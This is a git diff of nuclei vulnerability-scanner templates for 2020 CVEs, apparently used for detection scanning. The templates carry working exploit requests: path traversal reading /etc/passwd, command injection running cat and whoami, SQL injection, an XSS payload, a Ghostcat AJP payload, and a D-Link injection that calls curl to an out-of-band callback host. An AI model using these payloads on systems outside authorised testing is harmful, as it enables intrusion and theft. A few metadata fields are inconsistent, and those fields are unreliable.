a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2020-14864 -info: - name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion - author: Ivo Palazzolo (@palaziv) - severity: high - description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion - reference: - - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - - https://www.oracle.com/security-alerts/cpuoct2020.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-14864 - tags: cve,cve2020,oracle,lfi,kev -requests: - - method: GET - path: - - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies - - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' - cookie-reuse: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - 'root:.*:0:0:' - part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-15004.yaml b/nuclei-templates/CVE-2020/CVE-2020-15004.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15004.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15004.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15050.yaml b/nuclei-templates/CVE-2020/CVE-2020-15050.yaml new file mode 100644 index 0000000000..2b51015c16 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-15050.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-15050 + +info: + name: Suprema BioStar <2.8.2 - Local File Inclusion + author: gy741 + severity: high + description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + remediation: | + Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. + reference: + - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html + - https://www.supremainc.com/en/support/biostar-2-pakage.asp + - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-15050 + cwe-id: CWE-22 + epss-score: 0.282 + epss-percentile: 0.96359 + cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: supremainc + product: biostar_2 + tags: suprema,biostar2,packetstorm,cve,cve2020,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + +# digest: 4a0a0047304502201748fe0517c240bb83ec0ec0965da564cd9e752f4eeb6b4827ae98679a70647f022100f08ae9e4be6d7e4ed791766f5739fc5d17fe7734f73a8caf02ae094a0e6af5b2:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2020/CVE-2020-15129.yaml b/nuclei-templates/CVE-2020/CVE-2020-15129.yaml deleted file mode 100644 index 2f13517b4a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15129.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-15129 - -info: - name: Open-redirect in Traefik - author: dwisiswant0 - severity: medium - description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios. - reference: - - https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik - - https://github.com/containous/traefik/releases/tag/v2.2.8 - - https://github.com/containous/traefik/pull/7109 - - https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.7 - cve-id: CVE-2020-15129 - cwe-id: CWE-601 - tags: cve,cve2020,traefik,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}" - - headers: - X-Forwarded-Prefix: "https://foo.nl" - - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - part: body - words: - - "Found" diff --git a/nuclei-templates/CVE-2020/CVE-2020-15227.yaml b/nuclei-templates/CVE-2020/CVE-2020-15227.yaml deleted file mode 100644 index e483393043..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15227.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-15227 - -info: - name: Nette Framework RCE - author: becivells - severity: critical - description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md - tags: cve,cve2020,nette,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15227 - cwe-id: CWE-74 - -requests: - - method: GET - path: - - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-15568.yaml b/nuclei-templates/CVE-2020/CVE-2020-15568.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15568.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15568.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15920.yaml b/nuclei-templates/CVE-2020/CVE-2020-15920.yaml new file mode 100644 index 0000000000..24842d818f --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-15920.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-15920 + +info: + name: Mida eFramework <=2.9.0 - Remote Command Execution + author: dwisiswant0 + severity: critical + description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required. + reference: + - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html + - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-15920 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-15920 + cwe-id: CWE-78 + tags: cve,cve2020,mida,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2020/cve-2020-16270.yaml b/nuclei-templates/CVE-2020/CVE-2020-16270.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16270.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16270.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16846.yaml b/nuclei-templates/CVE-2020/CVE-2020-16846.yaml new file mode 100644 index 0000000000..0855dd3f8e --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-16846.yaml @@ -0,0 +1,51 @@ +id: CVE-2020-16846 + +info: + name: SaltStack <=3002 - Shell Injection + author: dwisiswant0 + severity: critical + description: | + SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client. + reference: + - https://saltproject.io/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/ + - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag + - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 + - https://nvd.nist.gov/vuln/detail/CVE-2020-16846 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-16846 + cwe-id: CWE-78 + epss-score: 0.97535 + tags: vulhub,cve,cve2020,saltstack,kev + metadata: + max-request: 1 + +http: + - method: POST + path: + - "{{BaseURL}}/run" + body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei" + headers: + Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "An unexpected error occurred" + + - type: dsl + dsl: + - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 500 +# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-16952.yaml b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml new file mode 100644 index 0000000000..09034350b3 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-16952 + +info: + name: Microsoft SharePoint - Remote Code Execution + author: dwisiswant0 + severity: high + description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package. + reference: + - https://srcincite.io/pocs/cve-2020-16952.py.txt + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 + - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md + - https://nvd.nist.gov/vuln/detail/CVE-2020-16952 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2020-16952 + cwe-id: CWE-346 + epss-score: 0.23324 + tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce + metadata: + max-request: 1 + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "15\\.0\\.0\\.(4571|5275|4351|5056)" + - "16\\.0\\.0\\.(10337|10364|10366)" + # - "16.0.10364.20001" + condition: or + + - type: regex + part: header + regex: + - "(?i)(Microsoftsharepointteamservices:)" + + - type: status + status: + - 200 + - 201 + condition: or + +# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2020/CVE-2020-17505.yaml b/nuclei-templates/CVE-2020/CVE-2020-17505.yaml deleted file mode 100644 index 1d14c7bc10..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-17505.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-17505 - -info: - name: Artica Web Proxy 4.30 OS Command Injection - author: dwisiswant0 - severity: high - description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. - reference: - - https://blog.max0x4141.com/post/artica_proxy/ - - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-17505 - cwe-id: CWE-78 - tags: cve,cve2020,rce,artica,proxy - -requests: - - raw: - - | - GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - "array(2)" - - "Position: ||whoami||" - - "root" - condition: and - - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-17518.yaml b/nuclei-templates/CVE-2020/CVE-2020-17518.yaml deleted file mode 100644 index 92ed6e04a7..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-17518.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2020-17518 - -info: - name: Apache Flink 1.5.1 - Local File Inclusion - author: pdteam - severity: high - description: | - Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER. - reference: - - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 - - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E - - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E - - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E - - https://nvd.nist.gov/vuln/detail/CVE-2020-17518 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2020-17518 - cwe-id: CWE-22 - cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97462 - tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive - metadata: - max-request: 2 - - -http: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y - - ------WebKitFormBoundaryoZ8meKnrrso89R6Y - Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" - - test-poc - ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- - - - method: GET - path: - - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc' - - matchers: - - type: dsl - dsl: - - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2020/cve-2020-17530.yaml b/nuclei-templates/CVE-2020/CVE-2020-17530.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17530.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17530.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml b/nuclei-templates/CVE-2020/CVE-2020-19282.yaml new file mode 100644 index 0000000000..92c5d3b641 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-19282.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-19282 + +info: + name: Jeesns 1.4.2 XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + reference: + - https://github.com/zchuanzhao/jeesns/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + - https://www.seebug.org/vuldb/ssvid-97940 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19282 + cwe-id: CWE-79 + tags: cve,cve2020,jeesns,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-19360.yaml b/nuclei-templates/CVE-2020/CVE-2020-19360.yaml deleted file mode 100644 index cd05632a86..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-19360.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-19360 - -info: - name: FHEM 6.0 - Local File Inclusion - author: 0x_Akoko - severity: high - description: FHEM version 6.0 suffers from a local file inclusion vulnerability. - reference: - - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md - - https://www.cvedetails.com/cve/CVE-2020-19360/ - - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability - - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-19360 - tags: fhem,lfi,cve,cve2020 - -requests: - - method: GET - path: - - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/CVE-2020-1938.yaml b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml new file mode 100644 index 0000000000..57b224992b --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-1938 + +info: + name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability + author: milo2012 + severity: critical + description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. + reference: + - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 + - https://nvd.nist.gov/vuln/detail/CVE-2020-1938 + - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E + - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-1938 + cwe-id: CWE-269 + tags: cve,cve2020,apache,tomcat,lfi,network + +network: + - inputs: + - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}" + + host: + - "{{Hostname}}" + - "{{Host}}:8009" + + read-size: 1024 + + matchers: + - type: word + words: + - "See the NOTICE file distributed with" + +# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml new file mode 100644 index 0000000000..84373917d5 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml @@ -0,0 +1,63 @@ +id: CVE-2020-2103 + +info: + name: Jenkins <=2.218 - Information Disclosure + author: c-sh0 + severity: medium + description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - http://www.openwall.com/lists/oss-security/2020/01/29/1 + - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-2103 + cwe-id: CWE-200 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* + epss-score: 0.00535 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:81586312 + tags: cve,cve2020,jenkins + +http: + - raw: + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/html' + - 'x-jenkins' + condition: and + case-insensitive: true + + - type: word + part: body_2 + words: + - 'Cookie' + - 'SessionId: null' + condition: and + + extractors: + - type: kval + kval: + - x_jenkins + +# Enhanced by md on 2023/04/04 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml deleted file mode 100644 index f447227d0e..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-22208 -info: - name: 74cms - ajax_street.php 'x' SQL Injection - author: ritikchaddha - severity: critical - description: | - SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. - reference: - - https://github.com/blindkey/cve_like/issues/10 - - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-22210 - cwe-id: CWE-89 - metadata: - fofa-query: app="74cms" - shodan-query: http.html:"74cms" - tags: cve,cve2020,74cms,sqli -variables: - num: "999999999" -requests: - - method: GET - path: - - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#' - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/CVE-2020-23575.yaml b/nuclei-templates/CVE-2020/CVE-2020-23575.yaml deleted file mode 100644 index 08adf1b0e6..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-23575.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-23575 -info: - name: Kyocera Printer d-COPIA253MF - Directory Traversal - author: 0x_Akoko - severity: high - description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server. - reference: - - https://www.exploit-db.com/exploits/48561 - - https://www.cvedetails.com/cve/CVE-2020-23575 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-23575 - cwe-id: CWE-22 - tags: cve,cve2021,printer,iot,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24312.yaml b/nuclei-templates/CVE-2020/CVE-2020-24312.yaml new file mode 100644 index 0000000000..0a816f673c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-24312.yaml @@ -0,0 +1,24 @@ +id: cve-2020-24312 +info: + name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure + author: x1m_martijn + severity: high + description: | + mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + reference: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + tags: cve,cve2020,wordpress,backups + # NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-24312 + # Source: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + # Note: Manually check content +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Index of" diff --git a/nuclei-templates/CVE-2020/CVE-2020-25506.yaml b/nuclei-templates/CVE-2020/CVE-2020-25506.yaml deleted file mode 100644 index f37aadde01..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-25506.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2020-25506 - -info: - name: D-Link DNS-320 - Unauthenticated Remote Code Execution - author: gy741 - severity: critical - description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. - reference: - - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-25506 - cwe-id: CWE-78 - epss-score: 0.97445 - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev - metadata: - max-request: 2 - -variables: - useragent: '{{rand_base(6)}}' - -http: - - raw: - - | - POST /cgi-bin/system_mgr.cgi? HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - - - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-2551.yaml b/nuclei-templates/CVE-2020/CVE-2020-2551.yaml deleted file mode 100644 index ae867a74b6..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-2551.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2020-2551 - -info: - name: Oracle WebLogic Server - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server. - reference: - - https://github.com/hktalent/CVE-2020-2551 - - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 - - https://www.oracle.com/security-alerts/cpujan2020.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-2551 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97281 - tags: cve,cve2020,oracle,weblogic,rce,unauth - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/console/login/LoginForm.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - "10.3.6.0" - - "12.1.3.0" - - "12.2.1.3" - - 